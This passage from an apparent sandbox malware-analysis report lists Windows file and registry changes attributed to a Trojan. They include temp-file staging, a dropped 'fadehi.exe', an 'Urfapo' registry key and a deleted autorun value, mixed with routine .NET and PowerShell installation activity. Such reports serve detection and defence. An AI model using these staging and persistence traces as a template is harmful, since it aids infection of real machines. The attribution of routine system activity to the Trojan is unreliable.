%System%\winrmprov.mof (0 bytes)
%WinDir%\imsins.BAK (0 bytes)
%System%\SETB.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET70.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET98.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET94.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET95.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET65.tmp (0 bytes)
%WinDir%\inf\oem10.inf (0 bytes)
%System%\SET28.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET92.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA4.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET45.tmp (0 bytes)
%System%\winrshost.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6E.tmp (0 bytes)
%System%\SET31.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAC.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6F.tmp (0 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\@.lnk (0 bytes)
%System%\GroupPolicy\Adm\SET21.tmp (0 bytes)
%System%\WsmPty.xsl (0 bytes)
%System%\WindowsPowerShell\v1.0\SET53.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC7.tmp (0 bytes)
%System%\SET29.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET82.tmp (0 bytes)
%System%\WsmRes.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET97.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB5.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCD.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAD.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETD0.tmp (0 bytes)
%System%\SET2C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETD1.tmp (0 bytes)
%System%\SET15.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4C.tmp (0 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETC3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET61.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9D.tmp (0 bytes)
%System%\SET24.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB1.tmp (0 bytes)
%System%\SET1C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET52.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET43.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET96.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7B.tmp (0 bytes)
%System%\winrssrv.dll (0 bytes)
%WinDir%\inf\WindowsRemoteShell.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET90.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET71.tmp (0 bytes)
%System%\SETD.tmp (0 bytes)
%System%\SET10.tmp (0 bytes)
%System%\SETC.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET47.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET85.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBB.tmp (0 bytes)
%System%\winrs.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SET60.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCB.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET77.tmp (0 bytes)
%WinDir%\inf\SET37.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET40.tmp (0 bytes)
%WinDir%\inf\SET38.tmp (0 bytes)
%System%\SET2F.tmp (0 bytes)
%System%\WsmSvc.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET78.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6A.tmp (0 bytes)
%System%\winrsmgr.dll (0 bytes)
%System%\SET30.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB4.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET50.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC6.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC0.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET42.tmp (0 bytes)
%System%\WsmTxt.xsl (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAB.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET1F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET83.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET20.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBA.tmp (0 bytes)

The process PSCustomSetupUtil.exe:620 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\3LPSVY14\Microsoft.PowerShell.Commands.Management.resources.dll (1552 bytes)

The process PSCustomSetupUtil.exe:452 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\VEHKNRUX\Microsoft.BackgroundIntelligentTransfer.Management.dll (1856 bytes)

The process PSCustomSetupUtil.exe:3908 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\FY147AEH\Microsoft.PowerShell.Commands.Utility.dll (20624 bytes)

The process PSCustomSetupUtil.exe:1924 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\XFJMPSVY\Microsoft.WSMan.Management.dll (9608 bytes)

The process PSCustomSetupUtil.exe:3064 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\2MPSVY14\System.Management.Automation.dll (81046 bytes)

The process PSCustomSetupUtil.exe:2308 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\RADGKNQT\Microsoft.PowerShell.Editor.dll (32824 bytes)

The process PSCustomSetupUtil.exe:2224 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\CX148BEH\Microsoft.PowerShell.GPowerShell.dll (22192 bytes)

The process PSCustomSetupUtil.exe:3696 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\3MPSVY15\Microsoft.PowerShell.ConsoleHost.dll (7192 bytes)

The process PSCustomSetupUtil.exe:3856 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\XFILORVY\Microsoft.PowerShell.Commands.Management.dll (9320 bytes)

The process PSCustomSetupUtil.exe:2176 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\L47ADHKN\Microsoft.WSMan.Management.resources.dll (13 bytes)

The process PSCustomSetupUtil.exe:2112 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\HZ258BEH\Microsoft.PowerShell.Commands.Utility.resources.dll (1552 bytes)

The process PSCustomSetupUtil.exe:2240 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\O7ADGKNQ\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll (7 bytes)

The process PSCustomSetupUtil.exe:3992 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\VDGJNQTW\Microsoft.PowerShell.Commands.Diagnostics.dll (3616 bytes)

The process PSCustomSetupUtil.exe:2288 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\K258CFIL\Microsoft.PowerShell.GraphicalHost.dll (9608 bytes)

The process PSCustomSetupUtil.exe:2344 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\YGKNQTWZ\Microsoft.PowerShell.GraphicalHost.resources.dll (784 bytes)

The process PSCustomSetupUtil.exe:3952 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\ATWZ258B\Microsoft.PowerShell.Security.dll (2392 bytes)

The process PSCustomSetupUtil.exe:2552 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\J258CFIL\Microsoft.PowerShell.Editor.resources.dll (2392 bytes)

The process PSCustomSetupUtil.exe:1496 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\7QTWZ258\Microsoft.PowerShell.Security.resources.dll (9 bytes)

The process PSCustomSetupUtil.exe:264 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\0JMPSVY1\Microsoft.WSMan.Runtime.dll (7 bytes)

The process PSCustomSetupUtil.exe:1868 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\RBEHKNRT\System.Management.Automation.resources.dll (9320 bytes)

The process PSCustomSetupUtil.exe:1284 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\WEHKNRUX\Microsoft.PowerShell.ConsoleHost.resources.dll (1552 bytes)

The process PSCustomSetupUtil.exe:2556 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\TBEILORU\Microsoft.PowerShell.GPowerShell.resources.dll (1552 bytes)

The process PSCustomSetupUtil.exe:2140 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\GY147ADG\Microsoft.PowerShell.Commands.Diagnostics.resources.dll (10 bytes)

The process yfenaromaf.exe:1664 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\tmp3.tmp (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmp4.tmp (7385 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\tmp3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmp4.tmp (0 bytes)

The process PSSetupNativeUtils.exe:1932 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (2 bytes)

The process mscorsvw.exe:3128 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log (68628 bytes)

The process mscorsvw.exe:2592 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD9.tmp\Microsoft.PowerShell.Commands.Utility.dll (40638 bytes)

The Trojan deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5b.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD9.tmp (0 bytes)

The process mscorsvw.exe:2284 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD8.tmp\Microsoft.PowerShell.Commands.Management.dll (45020 bytes)

The Trojan deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD8.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5a.dat (0 bytes)

The process mscorsvw.exe:2072 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD7.tmp\Microsoft.PowerShell.Commands.Diagnostics.dll (33116 bytes)

The Trojan deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD7.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index59.dat (0 bytes)

The process mscorsvw.exe:3084 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD6.tmp\Microsoft.BackgroundIntelligentTransfer.Management.dll (27440 bytes)

The Trojan deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD6.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index58.dat (0 bytes)

The process mscorsvw.exe:828 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDA.tmp\Microsoft.PowerShell.ConsoleHost.dll (33378 bytes)

The Trojan deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\index5c.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDA.tmp (0 bytes)

The process regsvr32.exe:3264 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\fadehi\fadehi.exe (1683 bytes)
%Documents and Settings%\%current user%\Application Data\Felaytzyymes\zaodxiibaru.ilb (4108 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\fadehi\fadehi.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpf7521b9d\bindata865.exe (0 bytes)

The process regsvr32.exe:3404 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe (45823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QL4XETI5\WindowsXP-KB968930-x86-ENG[1].exe (2977755 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QL4XETI5\WindowsXP-KB968930-x86-ENG[1].exe (0 bytes)

Registry activity

The process %original file name%.exe:1480 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "33 21 26 24 42 0D 64 B0 0A 16 86 EB 7C E3 5A 7D"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process mofcomp.exe:3476 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "73 51 16 36 9F 50 0D 16 B3 23 94 51 4D 35 C6 C3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process WindowsXP-KB968930-x86-ENG.exe:3964 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "80 82 8F CC A9 A1 40 A4 F8 51 2C 10 56 2A E6 06"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process new.exe:3664 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 58 BA 41 08 9A 12 3C 9B D7 93 76 94 2E 20 36"

The Trojan deletes the following value(s) in system registry:


The Trojan disables automatic startup of the application by deleting the following autorun value:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"{D53EE03B-A6B3-2507-CA3C-8ED347A30FAD}"

The process new.exe:3064 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5B B8 C8 2C 8F 04 92 5E 14 20 4A 9A 40 F9 90 92"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process net1.exe:2460 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1D 0E E4 26 9D 40 9F 1E 08 69 C4 F0 93 15 EF 23"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process tasklist.exe:2264 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 03 B3 D6 66 83 A3 48 34 6C DF 99 8F 6B 7D 31"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:3596 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1A 36 64 D7 9E FF B0 20 FC 56 F3 67 C9 FC EC 94"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:3168 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "80 5F AD 6C EC 7C 62 7F BA C4 FA 70 46 1A 06 A3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:3676 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "85 C6 03 F0 C9 84 43 E1 6C 20 5B 4D 57 22 90 6B"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:3300 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C9 56 86 4C 8D 9E 46 D1 19 B7 8E FA 9D D9 85 D6"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:856 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8C D6 B0 CB FC CB 8B 30 89 87 F7 CF 2E 72 FB 08"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:2988 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D2 81 77 D3 FF 89 57 BA 30 00 65 04 B7 50 54 0E"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:3172 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "05 A0 EE 99 9F 38 2C 67 59 66 B0 8C CD 5E F2 41"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:1960 makes changes in the system registry.


